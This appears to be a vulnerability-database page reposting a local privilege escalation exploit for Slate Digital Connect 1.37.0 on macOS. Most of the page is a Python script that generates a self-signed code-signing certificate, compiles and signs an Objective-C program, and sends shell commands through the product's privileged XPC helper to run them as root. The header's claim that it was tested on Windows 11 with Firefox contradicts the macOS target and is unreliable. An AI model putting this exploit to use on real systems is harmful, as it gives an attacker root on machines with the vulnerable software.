| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| CVE-2026-24066 | 10 Jun 202618:02 | โ | circl | |
| CVE-2026-24067 | 10 Jun 202618:04 | โ | circl | |
| Slate Digital Connect ๅฎๅ จๆผๆด | 10 Jun 202600:00 | โ | cnnvd | |
| Slate Digital Connect ๅฎๅ จๆผๆด | 10 Jun 202600:00 | โ | cnnvd | |
| CVE-2026-24066 | 10 Jun 202611:43 | โ | cve | |
| CVE-2026-24067 | 10 Jun 202611:49 | โ | cve | |
| CVE-2026-24066 Slate Digital Connect macOS XPC certificate validation privilege escalation | 10 Jun 202611:43 | โ | cvelist | |
| CVE-2026-24067 Slate Digital Connect macOS XPC PID validation privilege escalation | 10 Jun 202611:49 | โ | cvelist | |
| EUVD-2026-36000 | 10 Jun 202611:49 | โ | euvd | |
| EUVD-2026-36002 | 10 Jun 202611:43 | โ | euvd |
==================================================================================================================================
| # Title : Slate Digital Connect 1.37.0 Local Privilege Escalation Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://slatedigital.com/ |
==================================================================================================================================
[+] Summary : This Python script is a local privilege escalation exploit targeting Slate Digital Connect (CVE-2026-24066 and CVE-2026-24067).
[+] Payload :
#!/usr/bin/env python3
import os
import sys
import subprocess
import tempfile
import shutil
class SlateExploit:
def __init__(self):
self.cwd = os.getcwd()
self.tmp_dir = tempfile.mkdtemp()
def create_certificate(self):
"""Create signing certificate"""
print("[*] Creating signing certificate...")
openssl_cmds = [
"openssl genrsa -out codesign.key 4096",
f"openssl req -new -x509 -key codesign.key -out codesign.crt -days 3650 -subj '/CN=My Self Signed Code Cert/OU=3F5JHDQ8FZ/O=Test Org/C=US' -addext 'keyUsage=digitalSignature' -addext 'extendedKeyUsage=codeSigning'",
"openssl pkcs12 -export -inkey codesign.key -in codesign.crt -out codesign.p12 -passout pass:"
]
for cmd in openssl_cmds:
subprocess.run(cmd, shell=True, cwd=self.tmp_dir, check=True)
print("[+] Certificate created successfully")
def compile_exploit(self):
"""Compile exploit code"""
print("[*] Compiling exploit code...")
exploit_code = '''
#import <Foundation/Foundation.h>
#import <xpc/xpc.h>
int main() {
@autoreleasepool {
xpc_connection_t conn = xpc_connection_create_mach_service(
"com.slatedigital.connect.privileged.helper.tool2",
dispatch_get_main_queue(),
XPC_CONNECTION_MACH_SERVICE_PRIVILEGED
);
xpc_connection_resume(conn);
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_string(msg, "command", "/bin/bash -c 'id > /tmp/slate_root.txt'");
xpc_dictionary_set_string(msg, "action", "execute");
xpc_connection_send_message(conn, msg);
sleep(2);
}
return 0;
}
'''
exploit_file = os.path.join(self.tmp_dir, 'exploit.m')
with open(exploit_file, 'w') as f:
f.write(exploit_code)
subprocess.run(
f'clang -o {self.tmp_dir}/exploit {self.tmp_dir}/exploit.m -framework Foundation',
shell=True, check=True
)
print("[+] Exploit compiled successfully")
def sign_exploit(self):
"""Sign the exploit with the certificate"""
print("[*] Signing the exploit...")
cert_name = "My Self Signed Code Cert"
exploit_path = os.path.join(self.tmp_dir, 'exploit')
subprocess.run(
f'codesign --sign "{cert_name}" --force {exploit_path}',
shell=True, check=True
)
print("[+] Exploit signed successfully")
def run_exploit(self):
"""Run the exploit"""
print("[*] Running the exploit...")
exploit_path = os.path.join(self.tmp_dir, 'exploit')
os.chmod(exploit_path, 0o755)
result = subprocess.run(exploit_path, capture_output=True, text=True)
print(result.stdout)
if os.path.exists('/tmp/slate_root.txt'):
with open('/tmp/slate_root.txt', 'r') as f:
print(f"\n[+] Executed as root:\n{f.read()}")
else:
print("[-] Execution failed - maybe patched or service does not exist")
def cleanup(self):
"""Clean up temporary files"""
print("[*] Cleaning up temporary files...")
shutil.rmtree(self.tmp_dir, ignore_errors=True)
def exploit(self):
"""Execute the full attack"""
print("""
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Slate Digital Connect - Local Privilege Escalation โ
โ CVE-2026-24066 & CVE-2026-24067 โ
โ By indoushka โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
""")
try:
self.create_certificate()
self.compile_exploit()
self.sign_exploit()
self.run_exploit()
except Exception as e:
print(f"[-] Error: {e}")
finally:
self.cleanup()
if __name__ == "__main__":
exploit = SlateExploit()
exploit.exploit()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation